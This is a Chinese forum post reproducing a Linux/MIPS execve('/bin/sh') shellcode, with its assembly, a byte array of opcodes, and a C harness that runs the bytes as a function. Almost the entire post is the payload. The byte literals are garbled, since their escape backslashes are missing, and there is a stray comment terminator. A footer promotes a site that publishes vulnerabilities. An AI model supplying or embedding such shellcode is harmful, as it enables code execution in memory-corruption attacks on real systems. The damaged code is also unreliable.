
- 帖子
- 175
- 积分
- 287
- 阅读权限
- 10
- 注册时间
- 2007-10-23

|
24#
发表于 2019-10-13 23:01
| 只看该作者
Linux/MIPS - execve /bin/sh Date: 2011-11-24
Author: rigan - imrigan [at] gmail.com
.text
.global __start
__start:
slti $a2, $zero, -1
li $t7, 0x2f2f6269
sw $t7, -12($sp)
li $t6, 0x6e2f7368
sw $t6, -8($sp)
sw $zero, -4($sp)
la $a0, -12($sp)
slti $a1, $zero, -1
li $v0, 4011
syscall 0x40404
*/
#include <stdio.h>
char sc[] = {
"x28x06xffxff" /* slti a2,zero,-1 */
"x3cx0fx2fx2f" /* lui t7,0x2f2f */
"x35xefx62x69" /* ori t7,t7,0x6269 */
"xafxafxffxf4" /* sw t7,-12(sp) */
"x3cx0ex6ex2f" /* lui t6,0x6e2f */
"x35xcex73x68" /* ori t6,t6,0x7368 */
"xafxaexffxf8" /* sw t6,-8(sp) */
"xafxa0xffxfc" /* sw zero,-4(sp) */
"x27xa4xffxf4" /* addiu a0,sp,-12 */
"x28x05xffxff" /* slti a1,zero,-1 */
"x24x02x0fxab" /* li v0,4011 */
"x01x01x01x0c" /* syscall 0x40404 */
};
void main(void)
{
void(*s)(void);
printf("size: %d
", strlen(sc));
s = sc;
s();
}
公告:https://www.sitedirsec.com公布最新漏洞,请关注 |
|